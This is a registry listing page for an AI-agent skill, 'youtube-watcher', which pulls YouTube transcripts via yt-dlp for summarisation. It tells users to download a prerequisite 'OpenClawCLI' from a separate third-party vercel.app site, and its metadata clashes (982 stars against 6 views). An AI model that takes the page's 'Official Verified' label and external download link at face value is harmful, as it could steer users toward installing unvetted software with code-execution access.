ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified media Safety 4/5

youtube-watcher

Fetch and read transcripts from YouTube videos. Use when you need to summarize a video, answer questions about its content, or extract information from it.

Why use this skill?

Learn how to use the OpenClaw YouTube Watcher skill to fetch video transcripts for instant summarization, data extraction, and content analysis.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/stveenli/ytwatchervideo
Or

What This Skill Does

The YouTube Watcher skill is a specialized agent capability designed to bridge the gap between multimedia content and text-based reasoning. By leveraging the OpenClawCLI, this tool extracts raw transcripts from YouTube video URLs. Once the text data is retrieved, the OpenClaw AI agent can process, analyze, and synthesize the information. This is particularly useful for users who prefer reading over watching long-form content or those who need to quickly locate specific data points within a video. The skill relies on external dependencies, specifically yt-dlp, to bridge the interface between the platform and the local system environment.

Installation

To utilize this skill, ensure that OpenClawCLI is properly installed on your Windows or MacOS environment. You can retrieve the latest version from https://openclawcli.vercel.app/. Once the CLI is set up, verify that yt-dlp is installed and accessible via your system's PATH variable, as this acts as the backbone for transcript extraction. To add the skill to your agent, execute the command: clawhub install openclaw/skills/skills/stveenli/ytwatchervideo. Ensure you have the necessary execution permissions within your project directory for the script to run effectively.

Use Cases

This skill is highly versatile for information management. It is primarily used for summarizing lengthy lectures, tutorials, or podcasts into concise bullet points. It also serves as an excellent tool for researchers performing content audits, allowing for quick searches for specific keywords across multiple video sources. Developers may find it useful for extracting code snippets or technical explanations mentioned in tutorial videos, while content creators can use it to repurpose video content into blog posts or documentation.

Example Prompts

  1. "Can you watch this video and give me a 5-bullet point summary of the main arguments presented? https://www.youtube.com/watch?v=dQw4w9WgXcQ"
  2. "Search the transcript of this tutorial and explain how to configure the authentication settings step-by-step: https://www.youtube.com/watch?v=exampleID"
  3. "Summarize the section of this video that talks about financial projections and extract any key data points mentioned."

Tips & Limitations

Success depends heavily on the presence of closed captions or auto-generated subtitles. If a creator has disabled subtitles, the script will be unable to extract data. Always verify that your network environment allows access to YouTube services, as the script makes external requests. For best results, use videos with high-quality, manually transcribed captions to ensure the accuracy of the information provided by the AI agent. If the script fails, check your yt-dlp installation first, as it is the most common point of failure.

Metadata

Author@stveenli
Stars982
Views6
Updated2026-02-14
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-stveenli-ytwatchervideo": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#youtube#transcription#summarization#video-analysis#automation
Safety Score: 4/5

Flags: network-access, file-read, code-execution